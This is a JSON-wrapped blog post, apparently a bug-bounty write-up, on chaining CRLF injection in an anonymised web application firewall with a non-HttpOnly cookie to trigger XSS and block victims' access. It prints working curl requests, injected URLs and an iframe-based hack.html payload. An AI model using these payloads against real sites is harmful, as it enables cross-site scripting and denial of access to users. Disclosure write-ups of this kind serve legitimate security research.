{"id":747,"date":"2020-05-12T13:23:36","date_gmt":"2020-05-12T13:23:36","guid":{"rendered":"https:\/\/hackemall.live\/?p=747"},"modified":"2020-06-15T01:21:35","modified_gmt":"2020-06-15T01:21:35","slug":"web-application-firewall-exploit-if-you-cannot-protect-yourself-who-can-you-protect","status":"publish","type":"post","link":"https:\/\/hackemall.live\/index.php\/2020\/05\/12\/web-application-firewall-exploit-if-you-cannot-protect-yourself-who-can-you-protect\/","title":{"rendered":"Web Application Firewall Exploit: If you cannot protect yourself, who can you protect?"},"content":{"rendered":"\n<p style=\"font-size:18px\">Hi guys,<br>As my previous article about web application firewall (WAF) bypass \/ exploit <a href=\"https:\/\/hackemall.live\/index.php\/2020\/03\/31\/akamai-web-application-firewall-bypass-journey-exploiting-google-bigquery-sql-injection-vulnerability\/\">series<\/a>, today I will write my experience when exploit another popular WAF from a local vendor in Vietnam which also has a bug bounty platform, this is the first time I reported a vulnerability to a bug bounty platform in Vietnam. However, due to the limited disclosure ?!? from that vendor (why limited? I will explain in the end of this article), I will name the vendor in my article is <strong><span class=\"has-inline-color has-vivid-red-color\">Company-X<\/span><\/strong>, name the vulnerable WAF is <strong><span class=\"has-inline-color has-vivid-red-color\">WAF-DIRTYCLOUD<\/span><\/strong> and name the bug bounty platform is<strong> <span class=\"has-inline-color has-vivid-red-color\">Platform\u2013Z<\/span><\/strong>. Okay let\u2019s go.<br><br><\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/hom.jpg\" alt=\"\" class=\"wp-image-748\" width=\"608\" height=\"361\" srcset=\"https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/hom.jpg 811w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/hom-300x178.jpg 300w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/hom-768x455.jpg 768w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/hom-750x445.jpg 750w\" sizes=\"(max-width: 608px) 100vw, 608px\" \/><\/figure><\/div>\n\n\n\n<h2 class=\"wp-block-heading\"><strong><span class=\"has-inline-color has-vivid-red-color\">0x01: The Stumble Upon.<\/span><\/strong><\/h2>\n\n\n\n<p style=\"font-size:18px\">I and my teammate 0m3g4 did some notice about Company-X structure and got an interested thing. We found that multiple Company-X sites were implemented WAF-DIRTYCLOUD \/ load balancer. Basically WAF-DIRTYCLOUD itself vulnerable to CRLF injection. So, we chain 02 security vulnerabilities and can trigger XSS from victim side and block victim access to any vulnerable site due to incorrect cookie implement.<\/p>\n\n\n\n<p style=\"font-size:18px\">So, when a site \/ page was protected by a WAF and this WAF also had a security vulnerability \u00af_(\u30c4)_\/\u00af<\/p>\n\n\n\n<p><\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/self-fucking.jpg\" alt=\"\" class=\"wp-image-751\" width=\"292\" height=\"397\" srcset=\"https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/self-fucking.jpg 584w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/self-fucking-221x300.jpg 221w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/self-fucking-300x408.jpg 300w\" sizes=\"(max-width: 292px) 100vw, 292px\" \/><\/figure><\/div>\n\n\n\n<h2 class=\"wp-block-heading\"><strong><span class=\"has-inline-color has-vivid-red-color\">0x02: The Journey of Chained 02 Security Vulnerabilities.<\/span><\/strong><\/h2>\n\n\n\n<p style=\"font-size:18px\">In this article, I will call the vulnerable site is: <strong><span class=\"has-inline-color has-vivid-red-color\"><a href=\"http:\/\/0x1337.space\">http:\/\/0x1337.space<\/a><\/span><\/strong>.<br><br><strong>a) The first vulnerability: CRLF injection<\/strong><br><br>So in the first sign, we known that the page <strong><a href=\"http:\/\/0x1337.space\/\">http:\/\/0x1337.space<\/a><\/strong> was vulnerable with CRLF injection. The request I used simply<br>In your bash script simply run:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>curl -ik \"0x1337.space\/yyyyyaaayyyyyyy?y1uvc%0D%0A0m3g4:0m3g4ismyhero%0D%0AContent-Type:text\/html%0D%0Aducnt:1337%0D%0A\"<\/code><\/pre>\n\n\n\n<p style=\"font-size:18px\">and the response similar in below:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>HTTP\/1.1 200 OK\nContent-Length: 177\nLocation: http:\/\/0x1337.space\/?y1uvc\n0m3g4:0m3g4ismyhero\nContent-Type:text\/html\nducnt:1337\nDate: 07 May 2020 15:53:42 GMT\nContent-Type: text\/html\nServer: Unknown\n\n&lt;html>&lt;body>&lt;script>document.cookie=\"ABCD=df1b9a704851c4998219d38f8e483069\"+\"; expires=Fri, 31 Dec 9999 23:59:59 GMT; path=\/\";window.location.reload(true);&lt;\/script>&lt;\/body>&lt;\/html><\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/PoC-1-1-1024x397.png\" alt=\"\" class=\"wp-image-791\" width=\"1024\" height=\"397\" srcset=\"https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/PoC-1-1-1024x397.png 1024w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/PoC-1-1-300x116.png 300w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/PoC-1-1-768x298.png 768w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/PoC-1-1-1536x596.png 1536w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/PoC-1-1-750x291.png 750w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/PoC-1-1.png 1586w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption>CRLF<\/figcaption><\/figure><\/div>\n\n\n\n<p style=\"font-size:18px\"><strong>b) The second vulnerability: Incorrect cookie setting from <strong>WAF-DIRTYCLOUD<\/strong>.<br><\/strong><br>When access to any Company-X sites that implement <strong>WAF-DIRTYCLOUD<\/strong>. Bassically, <strong>WAF-DIRTYCLOUD<\/strong> used javascript for setting a cookie with the name is <code><strong><span class=\"has-inline-color has-vivid-red-color\">ABCD<\/span><\/strong><\/code> corresponding with a md5 token value for tracking. The vulnerability at here is about that <strong>WAF-DIRTYCLOUD<\/strong> forgot to set <strong><span class=\"has-inline-color has-vivid-red-color\">HttpOnly <\/span><\/strong>flag for the cookie in other words that cannot set <strong><span class=\"has-inline-color has-vivid-red-color\">HttpOnly <\/span><\/strong>flag when using javascript. :cool-WAF:<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/doge.png\" alt=\"\" class=\"wp-image-813\" width=\"256\" height=\"256\" srcset=\"https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/doge.png 512w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/doge-300x300.png 300w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/doge-150x150.png 150w\" sizes=\"(max-width: 256px) 100vw, 256px\" \/><\/figure><\/div>\n\n\n\n<p style=\"font-size:22px\"><em><strong>Request<\/strong>:<\/em><\/p>\n\n\n\n<p style=\"font-size:18px\">In your bash terminal, simply running this command:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>curl -ik \"0x1337.space\"<\/code><\/pre>\n\n\n\n<p style=\"font-size:22px\"><em><strong>Response:<\/strong><\/em><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>HTTP\/1.1 200 OK\nContent-Length: 177\nLocation: http:\/\/0x1337.space\/\nDate: 07 May 2020 15:50:20 GMT\nContent-Type: text\/html\nServer: Unknown\n\n&lt;html>&lt;body>&lt;script>document.cookie=\"ABCD=df1b9a704851c4998219d38f8e483069\"+\"; expires=Fri, 31 Dec 9999 23:59:59 GMT; path=\/\";window.location.reload(true);&lt;\/script>&lt;\/body>&lt;\/html><\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/PoC-2-1024x172.png\" alt=\"\" class=\"wp-image-757\" width=\"768\" height=\"129\" srcset=\"https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/PoC-2-1024x172.png 1024w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/PoC-2-300x50.png 300w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/PoC-2-768x129.png 768w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/PoC-2-1536x258.png 1536w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/PoC-2-750x126.png 750w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/PoC-2.png 1576w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><figcaption>No HttpOnly flag when using javascript for setting cookie<\/figcaption><\/figure><\/div>\n\n\n\n<p style=\"font-size:18px\"><strong>c) Chained 02 security vulnerabilities.<br><\/strong><br>So with the (b) section above, I think you asking yourself what is the vulnerability from here?. Bassically, if a cookie forgot to set <strong><span class=\"has-inline-color has-vivid-red-color\">HttpOnly <\/span><\/strong>flag, if there is a XSS vulnerability, attacker javascript payload easily access that cookie but that belong to the XSS problem. In this context of my article, I want to talk about somehow if <code><strong><span class=\"has-inline-color has-vivid-red-color\">ABCD<\/span><\/strong><\/code> cookie was set before and <strong><span class=\"has-inline-color has-vivid-red-color\">HttpOnly<\/span> <\/strong>flag was enabled too, what problem will happen with <strong>WAF-DIRTYCLOUD<\/strong> behavior?<\/p>\n\n\n\n<p style=\"font-size:22px\"><strong>Exploiting XSS vulnerability:<\/strong><\/p>\n\n\n\n<p style=\"font-size:18px\">So with only the first vulnerability, we can easily trigger a XSS vulnerability.<br><br><em><strong>Request<\/strong>:<br><\/em>Simply access to below URL:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:&#47;&#47;0x1337.space\/yyyyyaaayyyyyyy?y1uvc%0D%0A0m3g4:0m3g4ismyhero%0D%0AContent-Type:text\/html%0D%0ASet-Cookie:ABCD=ducnt1337;expires=Fri,%2031%20Dec%209999%2023:59:59%20GMT;path=\/%0D%0A%0D%0A%3Chtml%3E%3Cscript%3Ealert(document.domain)%3C\/script%3E%3C\/html%3E%3C%21--%0D%0A%0D%0A<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"399\" src=\"https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/XSS-triggered-1024x399.png\" alt=\"\" class=\"wp-image-758\" srcset=\"https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/XSS-triggered-1024x399.png 1024w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/XSS-triggered-300x117.png 300w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/XSS-triggered-768x300.png 768w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/XSS-triggered-750x293.png 750w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/XSS-triggered.png 1282w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption>XSS triggered<\/figcaption><\/figure><\/div>\n\n\n\n<p style=\"font-size:18px\">What&#8217;s your feel now? Implement WAF for prevent XSS exploit and WAF is the reason cause the XSS problem on your site. <img loading=\"lazy\" decoding=\"async\" width=\"198\" height=\"255\" class=\"wp-image-808\" style=\"width: 40px;\" src=\"https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/lol2.jpg\" alt=\"\"><\/p>\n\n\n\n<p style=\"font-size:22px\"><strong>Exploiting access blocked:<\/strong><\/p>\n\n\n\n<p style=\"font-size:18px\"><em>Exploit scenario:<\/em><br><em><br><\/em>1. Attacker host exploit script on the attacker site, for example: https:\/\/hackemall.live\/hack.html (j\/k :D). The exploit script similar that:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$ cat hack.html\n&lt;iframe src = \"http:\/\/abc.0x1337.space\/yyyyyaaayyyyyyy?y1uvc%0D%0A0m3g4:0m3g4ismyhero%0D%0AContent-Type:text\/html%0D%0ASet-Cookie:ABCD=concac;expires=Fri,%2031%20Dec%209999%2023:59:59%20GMT;path=\/;HttpOnly%0D%0A%0D%0A%3Chtml%3E%3Cscript%3Ealert(document.cookie)%3C\/script%3E%3C\/html%3E%3C!--%0D%0A%0D%0A\">gopro&lt;\/iframe>\n&lt;iframe src = \"http:\/\/xyz.0x1337.space\/yyyyyaaayyyyyyy?y1uvc%0D%0A0m3g4:0m3g4ismyhero%0D%0AContent-Type:text\/html%0D%0ASet-Cookie:ABCD=concac;expires=Fri,%2031%20Dec%209999%2023:59:59%20GMT;path=\/;HttpOnly%0D%0A%0D%0A%3Chtml%3E%3Cscript%3Ealert(document.cookie)%3C\/script%3E%3C\/html%3E%3C!--%0D%0A%0D%0A\">gopro&lt;\/iframe>\n&lt;iframe src = \"http:\/\/123.0x1337.space\/yyyyyaaayyyyyyy?y1uvc%0D%0A0m3g4:0m3g4ismyhero%0D%0AContent-Type:text\/html%0D%0ASet-Cookie:ABCD=concac;expires=Fri,%2031%20Dec%209999%2023:59:59%20GMT;path=\/;HttpOnly%0D%0A%0D%0A%3Chtml%3E%3Cscript%3Ealert(document.cookie)%3C\/script%3E%3C\/html%3E%3C!--%0D%0A%0D%0A\">gopro&lt;\/iframe><\/code><\/pre>\n\n\n\n<p style=\"font-size:18px\">2. Victim access to the attacker site, so victim cannot access to the <a href=\"http:\/\/abc.0x1337.space\">http:\/\/abc.0x1337.space<\/a>, <a href=\"http:\/\/xyz.0x1337.space\">http:\/\/xyz.0x1337.space<\/a> and <a href=\"http:\/\/123.0x1337.space\">http:\/\/123.0&#215;1337.space<\/a><\/p>\n\n\n\n<p style=\"font-size:18px\">3. How? <img loading=\"lazy\" decoding=\"async\" width=\"199\" height=\"253\" class=\"wp-image-810\" style=\"width: 40px;\" src=\"https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/magic.jpg\" alt=\"\"><\/p>\n\n\n\n<p style=\"font-size:18px\">To exploit access blocked, we chained 02 security vulnerabilities that I told above. The idea is using CRLF for setting a cookie with enable <strong><span class=\"has-inline-color has-vivid-red-color\">HttpOnly <\/span><\/strong>flag. After that, when victim access to the vulnerable site that attacker exploit above on the exploit script, <strong><span class=\"has-inline-color has-vivid-red-color\">WAF-DIRTYCLOUD<\/span><\/strong> will set <strong><span class=\"has-inline-color has-vivid-red-color\">ABCD<\/span><\/strong> cookie by using javascript. However the cookie exist before due to the attacker exploit and it also enabled <strong><span class=\"has-inline-color has-vivid-red-color\">HttpOnly<\/span><\/strong> flag (by CRLF injection), so <strong><span class=\"has-inline-color has-vivid-red-color\">WAF-DIRTYCLOUD<\/span><\/strong> cannot set <strong><span class=\"has-inline-color has-vivid-red-color\">ABCD<\/span><\/strong> cookie, try again, try again until timeout and will redirect to the <strong><span class=\"has-inline-color has-vivid-red-color\">WAF-DIRTYCLOUD<\/span><\/strong> error page. So the victim cannot access to the page was exploited. This attack will success when victim never access to the page was exploited before or victim just clear all the cookie from browser by somehow.<br><br><\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/PoC-Access-Blocked.png\" alt=\"\" class=\"wp-image-759\" width=\"742\" height=\"248\" srcset=\"https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/PoC-Access-Blocked.png 989w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/PoC-Access-Blocked-300x100.png 300w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/PoC-Access-Blocked-768x257.png 768w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/PoC-Access-Blocked-750x251.png 750w\" sizes=\"(max-width: 742px) 100vw, 742px\" \/><figcaption>Exploit successfully, access blocked<\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><strong><span class=\"has-inline-color has-vivid-red-color\">0x03: The number of affected site in our report, the vendor response \/ action and my thought.<\/span><\/strong><\/h2>\n\n\n\n<p style=\"font-size:22px\"><strong>Which sites \/ domains <strong>are<\/strong> affected?<\/strong><\/p>\n\n\n\n<p style=\"font-size:18px\">Any sites \/ domains implement <strong>WAF-DIRTYCLOUD are affected<\/strong> except there is a patch from vendor apply to that sites \/ domains.<\/p>\n\n\n\n<p style=\"font-size:22px\"><strong>The information from our report:<\/strong><\/p>\n\n\n\n<p style=\"font-size:18px\">So, I quickly draft a report, navigate to the vendor&#8217;s bug bounty platform and looking for the WAF-DIRTYCLOUD program. The vulnerability itself caused by WAF-DIRTYCLOUD but I cannot see WAF-DIRTYCLOUD program on the bug bounty platform from that vendor. However, the fun fact that vendor&#8217;s bug bounty platform also used WAF-DIRTYCLOUD and the platform itself was affected too.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/media.giphy.com\/media\/HPvfnOuz1tOgg\/giphy.gif\" alt=\"\" width=\"430\" height=\"215\"\/><\/figure><\/div>\n\n\n\n<p style=\"font-size:18px\">The number of vulnerable sites \/ domains in our report (included the bug bounty platform site).<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/number.png\" alt=\"\" class=\"wp-image-768\" width=\"250\" height=\"374\" srcset=\"https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/number.png 499w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/number-200x300.png 200w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/number-300x449.png 300w\" sizes=\"(max-width: 250px) 100vw, 250px\" \/><\/figure><\/div>\n\n\n\n<p style=\"font-size:22px\"><strong>The <span class=\"has-inline-color has-vivid-red-color\">Company-X<\/span> (Blue \/ Incident Response (IR) team) action:<\/strong><\/p>\n\n\n\n<p style=\"font-size:18px\"><em>From original in my report<\/em><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Update - Company-X Incident Response Team ?!?:\nToday (2020\/05\/07) from 19h GMT+7, Company-X Incident Response Team ?!? had a quick job that fix CRLF Injection that affect to WAF-DIRTYCLOUD. So many sites \/ domains was patched. However the patch still miss some sites \/ domains. So I still reproduce this and we decided report this vulnerability to Company-X via Platform-Z.<\/code><\/pre>\n\n\n\n<p style=\"font-size:18px\">So, somehow the vulnerability was patched quickly. Kudos to blue \/ IR team for a working hard.<br><br>The next day, staff of the vendor response to my report and field it was a duplicate with a private program, not so lucky for the first time report to a bug bounty platform program in Vietnam :D.<br><br>However, my report was duplicated and the vendor also had a patch, due to the <strong>huge <\/strong>of the risk of this vulnerability. I asked them for public disclosure this vulnerability and vendor just accept limited public disclosure !?! (<strong>yes, limited public disclosure for a public program and the patch also provided<\/strong>)<br><br><\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/luonleo-1024x569.jpg\" alt=\"\" class=\"wp-image-816\" width=\"512\" height=\"285\" srcset=\"https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/luonleo-1024x569.jpg 1024w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/luonleo-300x167.jpg 300w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/luonleo-768x427.jpg 768w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/luonleo-750x417.jpg 750w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/luonleo.jpg 1080w\" sizes=\"(max-width: 512px) 100vw, 512px\" \/><\/figure><\/div>\n\n\n\n<p style=\"font-size:18px\">I&#8217;m okay with this because my first intend when I public disclosure, I will limited disclosure and hide the vendor name also the WAF. That&#8217;s okay and this article will only focus on the technique. <\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"has-inline-color has-vivid-red-color\"><strong>0x04: Takeaway and bonus<\/strong>.<\/span><\/h2>\n\n\n\n<p style=\"font-size:22px\"><strong>To Vietnam community (#vicongdong):<\/strong><\/p>\n\n\n\n<p style=\"font-size:18px\">I think this security vulnerability has a huge impact, patch this vulnerability in the rightway that affect to all of sites \/ domains that implement the WAF-DIRTYCLOUD really hard and the number of vulnerable sites \/ domains too many. So protect yourself.<\/p>\n\n\n\n<p style=\"font-size:22px\"><strong>To bug bounty hunter \/ <strong>\u00a0security researcher<\/strong> and my thought:<\/strong><\/p>\n\n\n\n<p style=\"font-size:18px\">If you find a vulnerability that affected with large range (many sites \/ domains affected), I think you should be reward more also got some bonus from the vendor. Not only field in a duplicate and thanks and got points and <code><em><strong>they hope you submit any future security issues from you find<\/strong><\/em><\/code>. That&#8217;s not worthy with the time you spent. So that is the reason I rarely (never before) submit security vulnerability to a platform in my local country, not professional.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/vnfbb-618x1024.png\" alt=\"\" class=\"wp-image-775\" width=\"309\" height=\"512\" srcset=\"https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/vnfbb-618x1024.png 618w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/vnfbb-181x300.png 181w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/vnfbb-300x497.png 300w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/vnfbb.png 704w\" sizes=\"(max-width: 309px) 100vw, 309px\" \/><\/figure><\/div>\n\n\n\n<p style=\"font-size:22px\"><strong>Bonus:<\/strong> <strong><em>Peace, No War<\/em><\/strong><\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/bonus-1024x987.png\" alt=\"\" class=\"wp-image-777\" width=\"768\" height=\"740\" srcset=\"https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/bonus-1024x987.png 1024w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/bonus-300x289.png 300w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/bonus-768x740.png 768w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/bonus-750x723.png 750w, https:\/\/hackemall.live\/wp-content\/uploads\/2020\/05\/bonus.png 1284w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><\/figure><\/div>\n\n\n\n<p style=\"font-size:18px\"><strong>Thanks for reading and as usually, sorry for my bad engrisk&nbsp;\ud83d\ude06.<br>~Cheers,<\/strong><br><a href=\"https:\/\/twitter.com\/ducnt_\">ducnt<\/a><\/p>\n\n\n\n<p style=\"font-size:18px\"><strong>References<\/strong>:<br><a href=\"https:\/\/www.google.com\/about\/appsecurity\/\">https:\/\/www.google.com\/about\/appsecurity\/<\/a><br><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hi guys,As my previous article about web application firewall (WAF) bypass \/ exploit series, today I will write my experience when exploit another popular WAF from a local vendor in Vietnam which also has a bug bounty platform, this is the first time I reported a vulnerability to a bug bounty platform in Vietnam. However, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":858,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8,9,3,5],"tags":[],"_links":{"self":[{"href":"https:\/\/hackemall.live\/index.php\/wp-json\/wp\/v2\/posts\/747"}],"collection":[{"href":"https:\/\/hackemall.live\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hackemall.live\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hackemall.live\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hackemall.live\/index.php\/wp-json\/wp\/v2\/comments?post=747"}],"version-history":[{"count":90,"href":"https:\/\/hackemall.live\/index.php\/wp-json\/wp\/v2\/posts\/747\/revisions"}],"predecessor-version":[{"id":888,"href":"https:\/\/hackemall.live\/index.php\/wp-json\/wp\/v2\/posts\/747\/revisions\/888"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hackemall.live\/index.php\/wp-json\/wp\/v2\/media\/858"}],"wp:attachment":[{"href":"https:\/\/hackemall.live\/index.php\/wp-json\/wp\/v2\/media?parent=747"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hackemall.live\/index.php\/wp-json\/wp\/v2\/categories?post=747"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hackemall.live\/index.php\/wp-json\/wp\/v2\/tags?post=747"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}